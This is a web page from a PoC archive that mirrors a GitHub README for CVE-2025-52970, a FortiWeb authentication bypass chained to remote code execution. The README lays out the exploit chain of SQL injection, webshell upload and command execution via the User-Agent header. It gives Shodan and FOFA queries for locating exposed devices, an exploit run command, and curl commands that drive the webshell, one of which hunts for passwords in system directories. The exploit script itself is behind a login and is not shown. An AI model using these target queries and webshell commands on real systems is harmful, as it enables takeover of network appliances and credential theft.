Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2025-52970 PoC — Fortinet FortiWeb 安全漏洞

Source
https://github.com/Hex00-0x4/FortiWeb-CVE-2025-52970-Authentication-Bypass
Associated Vulnerability
Title:Fortinet FortiWeb 安全漏洞 (CVE-2025-52970)
Description:A improper handling of parameters in Fortinet FortiWeb versions 7.6.3 and below, versions 7.4.7 and below, versions 7.2.10 and below, and 7.0.10 and below may allow an unauthenticated remote attacker with non-public information pertaining to the device and targeted user to gain admin privileges on the device via a specially crafted request.
Readme
# 🚨 FortiWeb Authentication Bypass → Remote Code Execution 

## 📌 Overview
This repository demonstrates an **authentication bypass in FortiWeb** that can be chained to achieve **Remote Code Execution (RCE)**.  
The exploit leverages a vulnerable endpoint to inject SQL payloads, upload a webshell, and execute commands through HTTP headers.

⚠️ **Disclaimer**:  
This project is for **educational and research purposes only**.  
Do **NOT** use against systems you don’t own or have explicit permission to test.
### Netlas FOFA and Shodan

<img width="1841" height="898" alt="Screenshot 2025-08-23 131226" src="https://github.com/user-attachments/assets/e7f0e430-1405-4548-8b9f-53d04bc37dc1" />

```bash
((FortiWeb)) AND port:("8443")

### FOFA
title="FortiWeb" && port="8443"

### Shodan
ssl:"FortiWeb" port:8443
http.title:"FortiWeb" port:8443
```

## 🔎 Vulnerability Details
- **CVE**: CVE-2025-52970  
- **Component**: FortiWeb Fabric API (`/api/fabric/device/status`)  
- **Impact**: Authentication Bypass → SQL Injection → Webshell Upload → RCE  
- **Vector**: Crafted `Authorization` header + SQL injection

- 
## 🧑‍💻 Exploit Workflow
1. Drop and create temporary SQL table.
2. Write webshell payload in chunks.
3. Export shell to `/cgi-bin/x.cgi`.
4. Upload helper Python script to trigger permissions.
5. Access webshell by sending commands via `User-Agent` header.

   ## ⚙️ Usage

### 1️⃣ Clone Repo
```bash
git clone https://github.com/your-username/Fortinet-AuthBypass-Exploit.git
cd Fortinet-AuthBypass-Exploit
python3 exploit.py -t https://TARGET:8443/

```
<img width="1473" height="722" alt="Screenshot 2025-08-23 114753" src="https://github.com/user-attachments/assets/f95c022b-47dc-44ae-8fe5-e7f5694d3e97" />
<img width="1472" height="747" alt="Screenshot 2025-08-23 114915" src="https://github.com/user-attachments/assets/fad31eff-ecf5-41e6-872a-a9c22662db99" />

3️⃣ Interact with Webshell
```bash
curl -ks -H 'User-Agent: id' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: whoami' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: uname -a' https://TARGET:8443/cgi-bin/x.cgi
curl -ks -H 'User-Agent: grep -ril pass /etc /conf /data 2>/dev/null' https://TARGET:8443/cgi-bin/x.cgi
```
<img width="1477" height="722" alt="Screenshot 2025-08-23 114521" src="https://github.com/user-attachments/assets/47cdf826-5891-4192-9f77-b23cd17477bd" />
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →